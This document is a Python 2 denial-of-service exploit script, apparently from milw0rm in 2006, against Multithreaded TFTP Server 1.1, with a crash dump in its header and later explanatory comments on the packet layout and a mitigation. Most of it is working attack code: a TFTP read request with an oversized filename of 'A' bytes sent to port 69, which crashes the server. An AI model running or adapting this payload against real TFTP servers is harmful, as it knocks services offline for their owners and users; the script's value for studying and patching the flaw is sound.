#!/usr/bin/python
#Multithreaded TFTP 1.1 Server d0s exploit by n00b
#The following is affected, causing a denial of service
#due to an overly long GET request to the TFTP server
###########################################################################
#Tested on Windows XP SP1, SP2 (English).
#Vendor: don't know, but s00n will :p
#n00b is credited for finding this d0s exploit.
#Vendor web site: http://sourceforge.net/projects/tftp-server/
#I'm sorry if it looks a little messy, as Python isn't
#my strong point. Also I would like to thank milw0rm for
#all their help over the years, and ignted's.com
#And also a big shout to And any-one else I forgot ^ ^.
############################################################################
# \\DEBUG INF0//
#First chance exceptions are reported before any exception handling.
#This exception may be expected and handled.
#eax=77c5a76e ebx=77c5a7a0 ecx=77c318f2 edx=77c5cac8 esi=00407253 edi=41414141
#eip=77c44257 esp=00f9ff20 ebp=00f9ff2c iopl=0 nv up ei pl nz na po nc
#cs=001b ss=0023 ds=0023 es=0023 fs=0038 gs=0000 efl=00010206
#*** ERROR: Symbol file could not be found. Defaulted to export symbols.
#msvcrt!wcsxfrm+0x11d:
#77c44257 8a27 mov ah,[edi] ds:0023:41414141=??
############################################################################
import socket

# Set up a UDP socket
# TFTP is carried over UDP, hence a datagram socket rather than a stream
# socket; the connect() further down only fixes the default peer address
# used by send() and recvfrom().
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)

# send
# Payload layout (TFTP, RFC 1350): the leading \x00\x01 is opcode 1, a read
# request -- the "GET request" the header comment refers to.  Everything
# after it is the filename field, filled with 0x41 ('A') and far longer than
# any real filename.  The crash dump in the header (edi=41414141 at the
# faulting "mov ah,[edi]" inside msvcrt!wcsxfrm) is consistent with the
# oversized field clobbering a pointer that the server later dereferences:
# an unhandled access violation, which is the denial of service.  The
# server-side mitigation is to bound and validate the filename length
# before the request is parsed or converted.
# NOTE(review): the literal is reproduced exactly as this page gives it;
# the whitespace embedded in it is part of the bytes that get sent.
n00bstring ='''\x00\x01\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41 \x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41 \x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41 \x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41 \x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41 \x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41 \x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41 \x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41 \x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41 \x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41 \x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41 \x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41 \x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41 \x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41 \x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41 \x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41 \x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41 \x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41 \x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41 \x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41 \x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41 \x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41 \x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41 \x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41 \x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41 \x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41 \x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41 \x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41 \x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41 
\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41 \x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41 \x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41 \x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41 '''

# Target: the loopback address on the standard TFTP port.  This is Python 2
# code (print statement, str payload); it does not run unchanged under
# Python 3.
HOSTNAME = '127.0.0.1'
PORTNO = 69
s.connect((HOSTNAME, PORTNO))
# A short send() count is treated as failure; on a datagram socket the call
# normally either sends the whole datagram or raises socket.error.
if len(n00bstring) != s.send(n00bstring):
    # where to get error message "$!".
    # (Perl-ism carried over: Python reports a failed send() by raising
    # socket.error, not through a "$!"-style variable, so this branch is
    # unlikely to be reached.)
    print "cannot send to %s(%d):" % (HOSTNAME,PORTNO)
    raise SystemExit(1)
MAXLEN = 1024
# Blocks until a datagram arrives.  No timeout is set on the socket, so if
# the target never answers (the expected outcome when it has crashed) this
# call waits indefinitely.
(data,addr) = s.recvfrom(MAXLEN)
s.close()
print '%s(%d) said "%s"' % (addr[0],addr[1], data)
# milw0rm.com [2006-09-08]